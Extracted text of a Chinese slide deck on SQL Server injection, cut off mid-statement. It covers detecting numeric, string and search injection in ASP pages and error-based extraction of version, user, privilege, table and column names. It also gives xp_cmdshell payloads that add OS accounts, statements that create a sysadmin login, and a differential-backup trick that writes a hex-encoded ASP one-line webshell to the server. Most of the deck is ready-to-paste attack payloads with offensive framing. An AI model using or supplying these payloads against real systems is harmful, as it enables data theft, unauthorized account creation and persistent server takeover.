Sql server注入技巧.pptVIP

Sql 注入技巧 Sql server注入技巧 Sql注入技巧 注入的产生 页面a.asp的内容 %new=request(“id”)% new变量接受id传过来的值 sql=select * from news where id=new New直接接收浏览器提交的ID值,并且没有经过任何处理便直接放入sql语句查询,导致注入 Sql注入简介 数字型 select * from news where id = 1 判断方法 and 1=1 and 1=2 字符型 select * from news where id =‘a’ 判断方法 ’ and 1=1 ’ and 1=2-- ’目的是闭合 搜索型 select * from news where id like ’%字符%’ 可在输入框输入 a%’ 闭合,后面加上语句 如 a%’ and 1=1-- a%’ and 1=2-- 如何获取数据 获取字符串数据 iis在默认情况下会把ASP的出错详细信息返回给客户端.我们把字符串与数字进行比较,”@@version”是sqlserver内置的一个字符串变量,如果把他和数字比较时,肯定会出现错误: 环境探测 获取数据库版本 and (select @@version)0 获取当前数据库名 and db_name()0 获取当前数据库用户名 and user0 环境探测 获取用户权限 判断是否有比较高的权限 id=1 and 1=(select is_srvrolemember(‘sysadmin’)) id=1 and 1=(select is_srvrolemember(‘serveradmin’)) 等 判断当前数据库用户名是否为db_owner: id=1 and 1=(select is_member(‘db_owner’)) 获取重要数据 获得当前表名和此表的字段名 id=1 having 1=1 提示:列 ‘msgtitle.id’ 在选择列表中无效，因为该列未包含在聚合函数中，并且没有 GROUP BY 子句 可知:当前表为msgtitle,并且可以知道其中一个字段为id,接着获取下一个字段名: Id=1 group by id having 1=1 提示:列 ‘msgtitle.msgtitle’ 在选择列表中无效 再接着:id=1 group by id,msgtitle having 1=1 以此类推,直到页面返回正常,即表示所有被select选中的字段的名字都被显示出来了,因为”group by 所有字段”等于不进行”group by”,所以页面不会出错. 获取shell Xp_cmdshell sqlserver中的扩展存储过程中,这个是可以执行系统任意命令的,该存储过程调用格式是:exec master..xp_cmdshell”命令” 默认情况下,只有sysadmin固定服务器角色的成员才能执行此扩展存储过程. 获取shell 如果判断出是SA权限 直接浏览器后面提交 ;exec master..xp_cmdshell net user name password /add— 直接在服务器上创建了服务器性质的账户和密码,同时可以把此用户提升为管理员. 如果sqlserver支持远程连接,但是3389不支持,我们可以试着直接建SA权限的数据库账户,有了他,还有什么不能做的呢? exec master..sp_addlogin UserName,Password exec master..sp_addsrvrolemember UserName,sysadmin Db_owner权限获取shell 如何在这个权限下获得一个webshell? 方法:备份差异 前提:猜测出站点绝对路径 什么是备份差异? 通过对数据库备份,比较出数据库中的不同的地方,而把这些信息单独备份出来到某个地方. 语句回顾 Backup 备份 Create 创建 Insert 插入 备份差异思路 backup database 数据库名 to disk =c:\\charlog.bak;-- //备份数据库到某处 create table [dbo].[datachar] ([cmd] [image]) //创建名为datachar的表 insert into datachar(cmd) values(0x3C25657865637574652872657175657374282261222929253E)— //插入值,为一句话木马的16进制形式：%execute(request(a))% backup dat